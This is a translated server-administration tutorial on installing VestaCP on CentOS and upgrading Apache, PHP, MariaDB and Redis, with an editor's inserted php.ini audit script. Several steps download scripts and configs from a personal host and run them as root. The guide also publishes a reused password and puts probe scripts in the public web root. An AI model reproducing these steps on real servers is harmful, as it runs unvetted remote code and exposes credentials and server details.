Because remi's PHP packages are hard-bound to the stock httpd from the distribution's own repo, this setup cannot be used as-is on a production system; if you adopt it, be sure to skip every step that installs the SCL httpd! 👀
A reader asked through the contact form about the correct way to install VestaCP 🤔 I looked into it, and the cause is probably that remi's PHP recently moved up to 7.4: if you tick the remi repo during installation you are bumped straight to PHP 7.4, whose compatibility is still poor 🤔 As for VestaCP itself, the hosting control panel, I have been using it for about seven years; apart from one fairly serious server compromise the problems have been minor, and changing both the root password and the VestaCP admin password at the same time took care of it 🤔 Below I first provide a server probe and then my own notes from a manual installation~ 🐱👤
Installing VestaCP
First, a note: understanding this installation process takes a little time. Although the commands below look long, you can keep them in a notebook; as long as you edit the domain and account/password details beforehand (they are laid out by code block, so read carefully 🤔), the whole procedure takes under 10 minutes over SSH, which is what I find most convenient about VestaCP 🤔
Before installing, remove the old MariaDB version and switch to the latest version from the official MariaDB repo, currently 10.4 ✍✍✍
```bash
yum remove -y mariadb mariadb-\*
# Add the MariaDB repo
sudo rpm --import https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
wget -O /etc/yum.repos.d/MariaDB.repo http://ns4.edu.ryukyu/conf/MariaDB.repo
clear
cat /etc/yum.repos.d/MariaDB.repo | grep baseurl
```
### Start the VestaCP installation inside screen (so a dropped connection does not interrupt it) 🤔
```bash
screen -S vestacp
cd /opt
rm -f /opt/vst-install.sh
curl -O http://vestacp.com/pub/vst-install.sh
chmod 755 vst-install.sh
```
# Before starting the installation, replace the following values 🤔
- hostname 520.be // the domain name to use
- email admin@520.be // the administrator's e-mail address
- password y1d6u8YfPhxE // the administrator's password
# I only install the core web services: security is left to the CSF firewall, which I consider more comprehensive, and the spamassassin spam filter is skipped because it uses too much memory. If you need them, change spamassassin and clamav to yes 🤔
```bash
bash vst-install.sh --nginx yes --apache yes --phpfpm no --named yes --remi no --vsftpd yes --proftpd no --iptables no --fail2ban no --quota no --exim yes --dovecot yes --spamassassin no --clamav no --softaculous no --mysql yes --postgresql no --hostname 520.be --email admin@520.be --password y1d6u8YfPhxE --force
```
# Once the installation finishes, put VestaCP's command-line utilities on the PATH so they can be called directly 🤔
```bash
source /root/.bash_profile
PATH=$PATH:/usr/local/vesta/bin
export VESTA=/usr/local/vesta/
```
# Strengthen the blowfish_secret value in the phpMyAdmin config file 🤔
```bash
cp -f /etc/phpMyAdmin/config.inc.php /etc/phpMyAdmin/config.inc.php.bak
# 32 hex characters derived from a random seed (head -c instead of head -1, so urandom never has to produce a newline)
sed -i "s@blowfish_secret.*;@blowfish_secret\'\] = \'`head -c 64 /dev/urandom | md5sum | head -c 32`\';@" /etc/phpMyAdmin/config.inc.php
mkdir -p /var/lib/phpMyAdmin/temp/
chown -R apache:apache /var/lib/phpMyAdmin
```
# Remove the hosting packages you do not need 🤔
```bash
v-delete-database admin admin_default
v-delete-user-package palegreen
v-delete-user-package gainsboro
v-delete-user-package slategrey
rm -fr /usr/local/vesta/install/rhel/5
rm -fr /usr/local/vesta/install/rhel/6
rm -fr /usr/local/vesta/install/debian
rm -fr /usr/local/vesta/install/ubuntu
rm -f vst-install.sh vst-install-rhel.sh
```
# Fine-tune the basic VestaCP settings 🤔
```bash
sed -i "s#LANGUAGE='.*'#LANGUAGE='tw'#g" /usr/local/vesta/conf/vesta.conf
sed -i "s#LANGUAGE='.*'#LANGUAGE='tw'#g" /usr/local/vesta/data/users/admin/user.conf
sed -i "s#100000#unlimited#g" /usr/local/vesta/data/users/admin/user.conf
sed -i "s#100#unlimited#g" /usr/local/vesta/data/users/admin/user.conf
sed -i "s#100000#unlimited#g" /usr/local/vesta/data/packages/default.pkg
sed -i "s#100#unlimited#g" /usr/local/vesta/data/packages/default.pkg
```
# Change the database character set 🤔
```bash
mysql -V
rm -f /etc/my.cnf.d/mysql-clients.cnf.bak
mv /etc/my.cnf.d/mysql-clients.cnf /etc/my.cnf.d/mysql-clients.cnf.bak
wget -O /etc/my.cnf.d/mysql-clients.cnf http://ns4.edu.ryukyu/VestaCP_conf/mysql-clients.cnf
```
### Replace my.cnf with an optimised one (MariaDB 10+ only). This is the file I use myself; if it causes problems, I strongly recommend switching back to the my.cnf that VestaCP ships 🤔
```bash
mkdir -p /var/log/mariadb
mkdir -p /var/run/mariadb
touch /var/log/mariadb/mariadb.log
chown -R mysql:mysql /var/log/mariadb
chown -R mysql:mysql /var/run/mariadb
rm -f /etc/my.cnf.bak
mv /etc/my.cnf /etc/my.cnf.bak
# Recommended my.cnf for a 1GB VPS
wget -O /etc/my.cnf http://ns4.edu.ryukyu/VestaCP_conf/my.cnf_1GBRAM.md
# For a 4GB VPS switch to this my.cnf (the values this site uses); on bigger machines adjust the buffer_size settings further yourself
# vi +/buffer_size /etc/my.cnf
# wget -O /etc/my.cnf http://ns4.edu.ryukyu/VestaCP_conf/my.cnf_4GBRAM.md
# Restart MariaDB
systemctl enable mariadb && systemctl is-enabled mariadb
systemctl restart mariadb && systemctl status mariadb -l
# Check that it is running
ps ax | grep mysqld && lsof -itcp -n -P | grep mysqld
# Look at the MariaDB error log
tail -50 /var/log/mariadb/mariadb_error.log
```
# PS. To look up the MySQL root password:
```bash
cat /usr/local/vesta/conf/mysql.conf | grep PASSWORD
```
# The my.cnf files that VestaCP itself ships; open source is convenient 🤔
```bash
# my-small.cnf
wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-small.cnf
# my-medium.cnf
wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-medium.cnf
# my-large.cnf
wget -O /etc/my.cnf https://github.com/serghey-rodin/vesta/raw/master/install/rhel/7/mariadb/my-large.cnf
```
### Install a few handy diagnostic tools 🤔
# X-Prober 🤔
```bash
wget -O /home/admin/web/520.be/public_html/XProber.php https://raw.githubusercontent.com/kmvan/x-prober/master/dist/prober.php
```
# The PHP benchmark script from the popular Vanilla Forums project 🤔
```bash
wget -O /home/admin/web/520.be/public_html/vanilla-php_benchmark_script.php https://raw.githubusercontent.com/vanilla-php/benchmark-php/master/benchmark.php
```
# cloudwp's tool for checking which user account PHP runs as 🤔
```bash
wget -O /home/admin/web/520.be/public_html/cloud_whoami.php https://gist.githubusercontent.com/neltseng/876bd30b6438f8fd02ac/raw/22ae9d43635dd895fdca9df8fd2584611f640d2f/whoami.php
```
# WoltLab's PHP environment test tool 🤔
```bash
wget -O /home/admin/web/520.be/public_html/WCF_Test.php https://www.woltlab.com/media/301-test-php/
```
# Reset the permissions of all website folders and files, ref. [HOWTO] Correct files and folders permissions and ownership 🤔
```bash
wget -O /usr/local/vesta/bin/v-fix-websites-permissions http://ns4.edu.ryukyu/VestaCP_conf/v-fix-websites-permissions
chmod +x /usr/local/vesta/bin/v-fix-websites-permissions
v-fix-websites-permissions
```
### Enable awstats statistics 🤔
```bash
v-add-web-domain-stats admin 520.be awstats
```
### Create a database; the command is v-add-database <VestaCP user> <database name> <database user> <user password> 🤔
- MySQL database name: admin_db001
- MySQL user name: admin_user001
- MySQL user password: y1d6u8YfPhxE
```bash
v-add-database admin db001 user001 y1d6u8YfPhxE mysql
```
### Create an FTP account; the command is v-add-web-domain-ftp <VestaCP user> <domain name> <ftp user> <ftp user password> 🤔
- FTP login name: admin_ftp001
- FTP login password: y1d6u8YfPhxE
```bash
groupadd sftp-only
v-add-web-domain-ftp admin 520.be ftp001 y1d6u8YfPhxE
```
At this point the initial environment looks like this 🤔
- VestaCP console: https://520.be:8083
- X-Prober: http://520.be/XProber.php
- PHP environment test tool: http://520.be/WCF_Test.php
- PHP benchmark tool: http://520.be/vanilla-php_benchmark_script.php
- PHP run-as-user check tool: http://520.be/cloud_whoami.php
- Local path: /home/admin/web/520.be/public_html
- FTP account: admin_ftp001
- FTP password: y1d6u8YfPhxE
- FTP quick link: ftp://admin_ftp001:y1d6u8YfPhxE@520.be/public_html
- MySQL database name: admin_db001
- MySQL user name: admin_user001
- MySQL user password: y1d6u8YfPhxE
Upgrading Apache
SCL is a repo that is already built into CentOS and officially endorsed, so it can be used with confidence; I use it here to upgrade the Apache HTTP Server 🤔
### Back up the files 🤔
```bash
cd /usr/share/
mv roundcubemail/ roundcubemail_BAK/
mv phpMyAdmin/ phpMyAdmin_BAK/
cd /etc/httpd/conf.d/
mv roundcubemail.conf roundcubemail.conf.bak
mv phpMyAdmin.conf phpMyAdmin.conf.bak
cd /etc
cp -r httpd httpd_BAK
cp -r roundcubemail roundcubemail_BAK
cp -r phpMyAdmin phpMyAdmin_BAK
```
# Install the SCL repo 🤔
```bash
yum install -y epel-release centos-release-scl-rh centos-release-scl
sudo yum-config-manager --enable epel centos-sclo-rh centos-sclo-sclo
yum repolist
```
# Remove the old PHP version 🤔
```bash
# sudo yum remove -y php74-php-\*
sudo yum remove -y php php-tidy php-gd php-xmlrpc php-common php-xml \
  php-process php-cli php-mysql php php-soap php-mcrypt php-mbstring \
  php-bcmath php-pdo php-imap
```

# Install the SCL build of Apache 🤔
```bash
sudo yum install -y libcap-devel
sudo yum install -y httpd24-httpd httpd24-httpd-tools httpd24-libcurl \
  httpd24-nghttp2 httpd24-libnghttp2 httpd24-libnghttp2-devel \
  httpd24-runtime httpd24 httpd24-curl httpd24-httpd-devel \
  httpd24-libcurl-devel httpd24-mod_ldap httpd24-mod_session \
  httpd24-mod_ssl sclo-httpd24-mod_ruid2
scl enable httpd24 bash
```
# Create symlinks in the default locations 🤔
```bash
sudo ln -s /opt/rh/httpd24/root/usr/sbin/apachectl /usr/sbin/apachectl
sudo ln -s /opt/rh/httpd24/root/usr/sbin/fcgistarter /usr/sbin/fcgistarter
sudo ln -s /opt/rh/httpd24/root/usr/sbin/httpd /usr/sbin/httpd
sudo ln -s /opt/rh/httpd24/root/usr/sbin/httpd-scl-wrapper /usr/sbin/httpd-scl-wrapper
sudo ln -s /opt/rh/httpd24/root/usr/sbin/rotatelogs /usr/sbin/rotatelogs
sudo ln -s /opt/rh/httpd24/root/usr/sbin/suexec /usr/sbin/suexec
ls -lha /usr/sbin | grep httpd
httpd -v
```
# Restore the configuration files 🤔
```bash
rm -f /opt/rh/httpd24/root/etc/httpd/conf.d/*
cp /etc/httpd_BAK/conf.d/* /opt/rh/httpd24/root/etc/httpd/conf.d
rm -fr /etc/httpd/conf.d
sudo unlink /etc/httpd/conf.d
sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf.d /etc/httpd/conf.d
rm -f /opt/rh/httpd24/root/etc/httpd/conf.d/php.conf
rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/10-fcgid.conf
cp /etc/httpd_BAK/conf.modules.d/10-fcgid.conf /opt/rh/httpd24/root/etc/httpd/conf.modules.d
rm -fr /etc/httpd/conf.modules.d
sudo unlink /etc/httpd/conf.modules.d
sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf.modules.d /etc/httpd/conf.modules.d
rm -f /opt/rh/httpd24/root/etc/httpd/conf/*
cp /etc/httpd_BAK/conf/* /opt/rh/httpd24/root/etc/httpd/conf
rm -fr /etc/httpd/conf
sudo unlink /etc/httpd/conf
sudo ln -s /opt/rh/httpd24/root/etc/httpd/conf /etc/httpd/conf
sudo unlink /opt/rh/httpd24/root/usr/lib64/httpd/modules/mod_fcgid.so
sudo ln -s /usr/lib64/httpd/modules/mod_fcgid.so /opt/rh/httpd24/root/usr/lib64/httpd/modules/mod_fcgid.so
sudo unlink /etc/httpd/modules
sudo ln -s /opt/rh/httpd24/root/usr/lib64/httpd/modules /etc/httpd/modules
sudo unlink /usr/libexec/httpd-ssl-pass-dialog
sudo ln -s /opt/rh/httpd24/root/usr/libexec/httpd-ssl-pass-dialog /usr/libexec/httpd-ssl-pass-dialog
sed -i '/ruid2_module/d' /opt/rh/httpd24/root/etc/httpd/conf.d/ruid2.conf
```
At this point Apache has been upgraded; it will be started together with PHP once the PHP upgrade below is finished 🤔
Upgrading PHP
Install remi's repo. Because SCL's PHP 7.2 comes with rather few modules, I still go with remi's PHP 7.3 🤔
```bash
yum install -y http://mirrors.mediatemple.net/remi/enterprise/remi-release-7.rpm
sudo yum-config-manager --enable remi remi-php73
sudo yum-config-manager --disable remi-php54 remi-php55 remi-php56 remi-php70 remi-php71 remi-php72 remi-php74 remi-test remi-safe
yum repolist
```
### Install the PHP 7 packages; pick from the list below as you see fit 🤔
```bash
# Install the PHP 7 core components
sudo yum install -y --enablerepo=remi,remi-php73 php73 php73-build php73-php \
  php73-php-cli php73-php-common php73-php-devel php73-php-intl \
  php73-runtime php73-php-pear
# Install the pecl extensions
sudo yum install -y --enablerepo=remi,remi-php73 php73-php-pecl-apcu \
  php73-php-pecl-apcu-bc php73-php-pecl-apcu-devel php73-php-pecl-crypto \
  php73-php-pecl-event php73-php-pecl-geoip php73-php-pecl-http \
  php73-php-pecl-imagick php73-php-pecl-inotify php73-php-pecl-ip2location \
  php73-php-pecl-mcrypt php73-php-pecl-memcached php73-php-pecl-mongodb \
  php73-php-pecl-mysql php73-php-pecl-oauth php73-php-pecl-radius \
  php73-php-pecl-rar php73-php-pecl-rrd php73-php-pecl-swoole4 \
  php73-php-pecl-tcpwrap php73-php-pecl-varnish php73-php-pecl-xmldiff \
  php73-php-pecl-zip
# Install the companion components
sudo yum install -y --enablerepo=remi,remi-php73 php73-php-bcmath php73-php-gd \
  php73-php-imap php73-php-ldap php73-php-litespeed php73-php-mbstring \
  php73-php-mysqlnd php73-php-opcache php73-php-phalcon3 php73-php-pdo \
  php73-php-pgsql php73-php-pspell php73-php-snmp php73-php-tidy \
  php73-php-xmlrpc php73-unit-php php73-uwsgi-plugin-php php-tcpdf \
  php-tcpdf-dejavu-sans-fonts php73-php-ioncube-loader \
  phpMyAdmin roundcubemail webalizer
```
# Tune the PHP parameters; the disable_functions list is up to you 🤔
```bash
rm -fr /etc/php.d /etc/php.ini /etc/php.ini.rpmsave
sudo ln -s /etc/opt/remi/php73/php.ini /etc/php.ini
# Take the backup once, before any edit (the original repeated it after the first sed, which overwrote the pristine copy)
rm -f /etc/opt/remi/php73/php.ini.bak
cp /etc/opt/remi/php73/php.ini /etc/opt/remi/php73/php.ini.bak
# "popepassthru" and "fsocket" in the original list are not PHP function names; popen and fsockopen are assumed here
sed -i "s/disable_functions =.*/disable_functions = passthru,system,chroot,chgrp,chown,shell_exec,ini_alter,ini_restore,dl,readlink,symlink,popen,stream_socket_server,fsockopen/" /etc/opt/remi/php73/php.ini
sed -i 's/;upload_tmp_dir =/upload_tmp_dir = \/tmp/g' /etc/opt/remi/php73/php.ini
sed -i 's/max_input_time =.*/max_input_time = 3600/' /etc/opt/remi/php73/php.ini
sed -i 's/max_execution_time =.*/max_execution_time = 3600/' /etc/opt/remi/php73/php.ini
sed -i 's/max_file_uploads =.*/max_file_uploads = 200/g' /etc/opt/remi/php73/php.ini
sed -i 's/post_max_size =.*/post_max_size = 1024M/' /etc/opt/remi/php73/php.ini
sed -i 's/memory_limit = .*/memory_limit = 512M/' /etc/opt/remi/php73/php.ini
sed -i 's/upload_max_filesize =.*/upload_max_filesize = 1024M/' /etc/opt/remi/php73/php.ini
sed -i 's/output_buffering =.*/output_buffering = Off/' /etc/opt/remi/php73/php.ini
sed -i 's/;date.timezone.*/date.timezone = Asia\/Taipei/' /etc/opt/remi/php73/php.ini
sed -i 's/;session.cookie_secure.*/session.cookie_secure = True/' /etc/opt/remi/php73/php.ini
```
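Added example, not from the original post: a small POSIX shell audit that reads a php.ini and confirms the hardening above actually took effect (the explicit values the sed commands write plus a few of the disabled functions). It runs against two constructed sample files so it works offline; on a real host point it at /etc/opt/remi/php73/php.ini.

```shell
#!/bin/sh
# Added example: verify php.ini hardening. Both sample files below are constructed
# here; they are not copies of any real server's php.ini.

# Print the effective value of KEY in FILE: the last uncommented assignment,
# with any trailing ";" comment and surrounding whitespace removed.
php_ini_get() {
    grep -E "^[[:space:]]*$2[[:space:]]*=" "$1" | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/;.*$//' -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//'
}

# Exit 0 if FUNC is one of the comma-separated names in disable_functions.
php_func_disabled() {
    php_ini_get "$1" disable_functions | tr ',' '\n' | tr -d ' \t' | grep -qx "$2"
}

# Print the number of failing checks for FILE (0 means every expectation holds);
# each failure is described on stderr. Always exits 0 so it composes under set -e.
php_ini_failures() {
    ini_file=$1
    fail_count=0
    # key=value pairs exactly as the sed edits above write them
    for expect in "session.cookie_secure=True" "upload_tmp_dir=/tmp" \
                  "date.timezone=Asia/Taipei" "output_buffering=Off" "memory_limit=512M"; do
        key=${expect%%=*}
        want=${expect#*=}
        got=$(php_ini_get "$ini_file" "$key")
        if [ "$got" != "$want" ]; then
            printf 'FAIL %s: got "%s", want "%s"\n' "$key" "$got" "$want" >&2
            fail_count=$((fail_count + 1))
        fi
    done
    # A subset of the functions the disable_functions line above turns off
    for fn in passthru system shell_exec dl; do
        if ! php_func_disabled "$ini_file" "$fn"; then
            printf 'FAIL disable_functions: %s is still callable\n' "$fn" >&2
            fail_count=$((fail_count + 1))
        fi
    done
    echo "$fail_count"
}

# Constructed sample 1: what php.ini looks like after the edits above.
HARDENED_INI=$(mktemp)
cat > "$HARDENED_INI" <<'EOF'
[PHP]
; commented-out defaults must be ignored by the parser
;session.cookie_secure =
disable_functions = passthru,system,chroot,shell_exec,dl,readlink,symlink,stream_socket_server
upload_tmp_dir = /tmp
memory_limit = 512M
output_buffering = Off   ; inline comment, also ignored
date.timezone = Asia/Taipei
session.cookie_secure = True
EOF

# Constructed sample 2: stock defaults, nothing hardened.
WEAK_INI=$(mktemp)
cat > "$WEAK_INI" <<'EOF'
[PHP]
disable_functions =
upload_tmp_dir = /tmp
memory_limit = 128M
output_buffering = 4096
;date.timezone =
;session.cookie_secure =
EOF
trap 'rm -f "$HARDENED_INI" "$WEAK_INI"' EXIT

printf 'hardened sample: %s failing check(s)\n' "$(php_ini_failures "$HARDENED_INI")"
printf 'stock sample:    %s failing check(s)\n' "$(php_ini_failures "$WEAK_INI" 2>/dev/null)"
```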
# Tune the OPcache parameters 🤔
```bash
rm -f /etc/opt/remi/php73/php.d/10-opcache.ini.bak
mv /etc/opt/remi/php73/php.d/10-opcache.ini /etc/opt/remi/php73/php.d/10-opcache.ini.bak
cat <<"EOF" > /etc/opt/remi/php73/php.d/10-opcache.ini
; Enable Zend OPcache extension module
[opcache]
zend_extension=opcache
opcache.enable=1
opcache.enable_cli=1
opcache.interned_strings_buffer=8
opcache.max_accelerated_files=10000
opcache.memory_consumption=128
opcache.save_comments=1
opcache.revalidate_freq=1
opcache.fast_shutdown=1
EOF
```
# Create symlinks in the default locations 🤔
```bash
sudo ln -s /opt/remi/php73/root/usr/bin/php /usr/bin/php
sudo ln -s /opt/remi/php73/root/usr/bin/php-cgi /usr/bin/php-cgi
sudo ln -s /opt/remi/php73/root/usr/bin/php-config /usr/bin/php-config
sudo ln -s /opt/remi/php73/root/usr/bin/phpize /usr/bin/phpize
sudo ln -s /opt/remi/php73/root/usr/bin/pecl /usr/bin/pecl
sudo ln -s /opt/remi/php73/root/usr/bin/pear /usr/bin/pear
sudo ln -s /opt/remi/php73/root/usr/bin/phar.phar /usr/bin/phar
ls -lha /usr/bin | grep php
pear version
pecl help version
phar version
php -v
```
# Add a cron job that updates the remi packages every day at 03:05 🤔
```bash
crontab -l | { cat; echo "5 3 * * * sudo yum --enablerepo=remi,remi-php73 update -y > /dev/null 2>&1"; } | crontab -
crontab -l
```
### Install the SCL build of Redis 🤔
```bash
# yum list rh-redis5-\*
sudo yum remove -y redis && sudo yum install -y rh-redis5 rh-redis5-redis
scl enable rh-redis5 bash
# Install the Redis PHP modules
sudo yum install -y --enablerepo=remi,remi-php73 php73-php-phpiredis php73-php-pecl-redis5 php73-php-pecl-igbinary php73-php-pecl-igbinary-devel
```
# Tune the Redis parameters. With more than 1GB of RAM you can raise maxclients and maxmemory, but don't let Redis take too large a share of total memory; its appetite can be frightening 🤔
```bash
sed -i 's/# maxclients 10000/maxclients 128/g' /etc/opt/rh/rh-redis5/redis.conf
sed -i 's/daemonize no/daemonize yes/g' /etc/opt/rh/rh-redis5/redis.conf
sed -i 's/timeout 0/timeout 300/g' /etc/opt/rh/rh-redis5/redis.conf
sed -i 's/# maxmemory <bytes>/maxmemory 100mb/g' /etc/opt/rh/rh-redis5/redis.conf
sed -i '/overcommit_memory/d' /etc/sysctl.conf
sed -i '$avm.overcommit_memory = 1' /etc/sysctl.conf
# Apply the sysctl change now rather than waiting for a reboot
sysctl -p
```
# Create symlinks in the default locations 🤔
```bash
sudo unlink /usr/bin/redis-benchmark
sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-benchmark /usr/bin/redis-benchmark
sudo unlink /usr/bin/redis-cli
sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-cli /usr/bin/redis-cli
sudo unlink /usr/bin/redis-server
sudo ln -s /opt/rh/rh-redis5/root/usr/bin/redis-server /usr/bin/redis-server
ls -lha /usr/bin | grep redis
redis-server -v
```
# Start Redis 🤔
```bash
# Start Redis
systemctl enable rh-redis5-redis && systemctl is-enabled rh-redis5-redis
systemctl restart rh-redis5-redis && systemctl status rh-redis5-redis -l
# Verify Redis
ps ax | grep redis-server && lsof -itcp -n -P | grep redis-server
php -m | grep redis
php -m | grep igbinary
```
### Install Memcached from remi 🤔
```bash
yum --enablerepo=remi,remi-php73 install -y memcached libmemcached-opt php73-php-pecl-memcached
php -m | grep memcached
# Add a cron job that updates Memcached every day at 03:10
crontab -l | { cat; echo "10 3 * * * yum --enablerepo=remi,remi-php73 update -y memcached libmemcached-opt php73-php-pecl-memcached > /dev/null 2>&1"; } | crontab -
crontab -l
```
### Restore the configuration files 🤔
```bash
# Restore the RoundCube files
rm -f /etc/roundcubemail/defaults.inc.php
rm -f /etc/roundcubemail/mimetypes.php
rm -f /etc/roundcubemail/config.inc.php.bak
mv /etc/roundcubemail/config.inc.php /etc/roundcubemail/config.inc.php.bak
cp -f /etc/roundcubemail_BAK/config.inc.php /etc/roundcubemail/config.inc.php
cp -f /etc/roundcubemail_BAK/defaults.inc.php /etc/roundcubemail/defaults.inc.php
cp -f /etc/roundcubemail_BAK/mimetypes.php /etc/roundcubemail/mimetypes.php
rm -f /etc/roundcubemail/roundcubemail.conf
cp -f /usr/share/roundcubemail_BAK/plugins/password/drivers/vesta.php /usr/share/roundcubemail/plugins/password/drivers/vesta.php
cp -f /usr/share/roundcubemail_BAK/plugins/password/config.inc.php /usr/share/roundcubemail/plugins/password/config.inc.php
# Restore the phpMyAdmin files
rm -f /etc/phpMyAdmin/config.inc.php
cp /etc/phpMyAdmin_BAK/config.inc.php /etc/phpMyAdmin
# Set permissions
chown -R root:apache /etc/roundcubemail
chown -R root:apache /etc/phpMyAdmin
chown -R root:apache /usr/share/roundcubemail
chown -R root:apache /usr/share/phpMyAdmin
```
# Link the PHP module into the SCL build of httpd 🤔
```bash
wget -O /opt/rh/httpd24/root/etc/httpd/conf.d/php73-php.conf http://ns4.edu.ryukyu/VestaCP_conf/php73-php.conf.md
rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/15-php.conf
rm -f /opt/rh/httpd24/root/etc/httpd/conf.modules.d/15-php73.conf
sudo unlink /opt/rh/httpd24/root/usr/lib64/httpd/modules/libphp73.so
sudo ln -s /opt/remi/php73/root/usr/lib64/httpd/modules/libphp7.so /opt/rh/httpd24/root/usr/lib64/httpd/modules/libphp73.so
```
# Register the library paths 🤔
```bash
cp /etc/ld.so.conf /etc/ld.so.conf.bak
echo "/usr/local/lib" >> /etc/ld.so.conf
echo "/usr/local/lib64" >> /etc/ld.so.conf
echo "/opt/rh/httpd24/root/usr/lib64" >> /etc/ld.so.conf
echo "/opt/remi/php73/root/usr/lib64" >> /etc/ld.so.conf
ldconfig
```
# Change the open_basedir setting 🤔
```bash
sed -i 's#open_basedir .*#open_basedir %docroot%:%home%/%user%/tmp:/proc/#g' /usr/local/vesta/data/templates/web/httpd/default.tpl
sed -i 's#open_basedir .*#open_basedir %sdocroot%:%home%/%user%/tmp:/proc/#g' /usr/local/vesta/data/templates/web/httpd/default.stpl
sed -i 's#/home/admin/tmp#/home/admin/tmp:/proc/#g' /home/admin/conf/web/520.be.httpd.conf
```
### Set up automatic service restarts 🤔
```bash
# Automatic restart for the SCL Apache service
mkdir -p /etc/systemd/system/httpd24-httpd.service.d/
rm -f /etc/systemd/system/httpd24-httpd.service.d/restart.conf
cat <<"EOF" > /etc/systemd/system/httpd24-httpd.service.d/restart.conf
[Service]
Restart=on-failure
RestartSec=3
EOF
clear
# Automatic restart for the nginx service
mkdir -p /etc/systemd/system/nginx.service.d/
rm -f /etc/systemd/system/nginx.service.d/restart.conf
cat <<"EOF" > /etc/systemd/system/nginx.service.d/restart.conf
[Service]
Restart=on-failure
RestartSec=3
EOF
clear
# Automatic restart for the MariaDB service
mkdir -p /etc/systemd/system/mariadb.service.d/
rm -f /etc/systemd/system/mariadb.service.d/restart.conf
cat <<"EOF" > /etc/systemd/system/mariadb.service.d/restart.conf
[Service]
Restart=on-failure
RestartSec=3
EOF
cat <<"EOF" > /etc/systemd/system/mariadb.service.d/override.conf
[Service]
LimitNOFILE=65535
EOF
clear
systemctl daemon-reload
systemctl stop httpd && systemctl disable httpd
```
### Enable the SCL build of Apache 🤔
```bash
# Check the Apache configuration
wget -O /opt/rh/httpd24/root/etc/httpd/conf/httpd.conf http://ns4.edu.ryukyu/VestaCP_conf/httpd.conf
/opt/rh/httpd24/root/usr/sbin/apachectl -t
# Enable the SCL Apache service
rm -f /usr/lib/systemd/system/httpd.service
sudo ln -s /usr/lib/systemd/system/httpd24-httpd.service /usr/lib/systemd/system/httpd.service
systemctl enable httpd && systemctl is-enabled httpd
systemctl daemon-reload
# Start the Apache service
systemctl restart httpd && systemctl status httpd -l
/opt/rh/httpd24/root/usr/sbin/apachectl -V
lsof -itcp -n -P | grep httpd
```
At this point all the web services have been upgraded 🤔
Setting up HTTPS, HSTS, HTTP/2 and OCSP
Let's Encrypt SSL has been running stably for several years now; for a free certificate it is of course the first choice, and VestaCP integrates with it nicely, renewing automatically 🤔
```bash
v-add-letsencrypt-domain admin 520.be
v-list-web-domains admin
v-update-host-certificate admin $HOSTNAME
echo "UPDATE_HOSTNAME_SSL='yes'" >> /usr/local/vesta/conf/vesta.conf
```
### Deploy the Let's Encrypt certificate for VestaCP itself 🤔
```bash
rm -f /usr/local/vesta/ssl/*.bak
mv /usr/local/vesta/ssl/certificate.ca /usr/local/vesta/ssl/certificate.ca.bak
ln -fs /home/admin/conf/web/ssl.520.be.ca /usr/local/vesta/ssl/certificate.ca
mv /usr/local/vesta/ssl/certificate.crt /usr/local/vesta/ssl/certificate.crt.bak
ln -fs /home/admin/conf/web/ssl.520.be.crt /usr/local/vesta/ssl/certificate.crt
mv /usr/local/vesta/ssl/certificate.key /usr/local/vesta/ssl/certificate.key.bak
ln -fs /home/admin/conf/web/ssl.520.be.key /usr/local/vesta/ssl/certificate.key
mv /usr/local/vesta/ssl/certificate.pem /usr/local/vesta/ssl/certificate.pem.bak
ln -fs /home/admin/conf/web/ssl.520.be.pem /usr/local/vesta/ssl/certificate.pem
chown -h root:mail /usr/local/vesta/ssl/certificate.ca
chown -h root:mail /usr/local/vesta/ssl/certificate.crt
chown -h root:mail /usr/local/vesta/ssl/certificate.key
chown -h root:mail /usr/local/vesta/ssl/certificate.pem
service vesta restart && service vesta status -l
```
### Deploy the Let's Encrypt certificate for Webmin 🤔
```bash
rm -f /etc/webmin/miniserv.conf.bak
cp /etc/webmin/miniserv.conf /etc/webmin/miniserv.conf.bak
echo "extracas=/usr/local/vesta/ssl/certificate.ca" >> /etc/webmin/miniserv.conf
echo "certfile=/usr/local/vesta/ssl/certificate.crt" >> /etc/webmin/miniserv.conf
sed -i 's#extracas=.*#extracas=/usr/local/vesta/ssl/certificate.ca#g' /etc/webmin/miniserv.conf
sed -i 's#certfile=.*#certfile=/usr/local/vesta/ssl/certificate.crt#g' /etc/webmin/miniserv.conf
sed -i 's#keyfile=.*#keyfile=/usr/local/vesta/ssl/certificate.key#g' /etc/webmin/miniserv.conf
clear
cat /etc/webmin/miniserv.conf | grep certificate
service webmin restart && service webmin status -l
```
### Add HSTS and http2 to the default templates used when creating new sites 🤔
```bash
rm -f /usr/local/vesta/data/templates/web/nginx/default.stpl.bak
rm -f /usr/local/vesta/data/templates/web/nginx/hosting.stpl.bak
rm -f /usr/local/vesta/data/templates/web/nginx/caching.stpl.bak
cp -f /usr/local/vesta/data/templates/web/nginx/default.stpl /usr/local/vesta/data/templates/web/nginx/default.stpl.bak
cp -f /usr/local/vesta/data/templates/web/nginx/hosting.stpl /usr/local/vesta/data/templates/web/nginx/hosting.stpl.bak
cp -f /usr/local/vesta/data/templates/web/nginx/caching.stpl /usr/local/vesta/data/templates/web/nginx/caching.stpl.bak
sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/default.stpl
sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/hosting.stpl
sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /usr/local/vesta/data/templates/web/nginx/caching.stpl
# Enable HSTS on the existing sites too
sed -i '/Strict-Transport-Security/d' /home/admin/conf/web/*.nginx.ssl.conf
sed -i '/server_name/a add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;' /home/admin/conf/web/*.nginx.ssl.conf
# http2
sed -i 's/proxy_ssl_port% ssl/proxy_ssl_port% http2 ssl/g' /usr/local/vesta/data/templates/web/nginx/default.stpl
